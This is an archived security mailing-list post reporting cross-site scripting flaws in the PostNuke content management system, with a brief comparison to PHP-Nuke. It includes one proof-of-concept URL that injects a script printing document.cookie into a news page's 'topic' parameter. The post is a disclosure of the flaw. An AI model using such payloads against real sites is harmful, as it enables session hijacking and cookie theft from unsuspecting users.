Postnuke XSS issues

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



I got an awful lot of email from BUGTRAQers saying that the solution
for PHPNUKE's problems is to use Postnuke.  This is obviously not
a panacea.

http://news.postnuke.com/modules.php?op=modload&name=News&file=index&catid=&topic=><script>alert(document.cookie);</script>

It's obviously apparent that CMS has a long way to go.  Godspeed
to those deploying it in production environments.  May the force be
with you.

-- 
Mark Grimes <mark@stateful.net>
Stateful Labs

[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux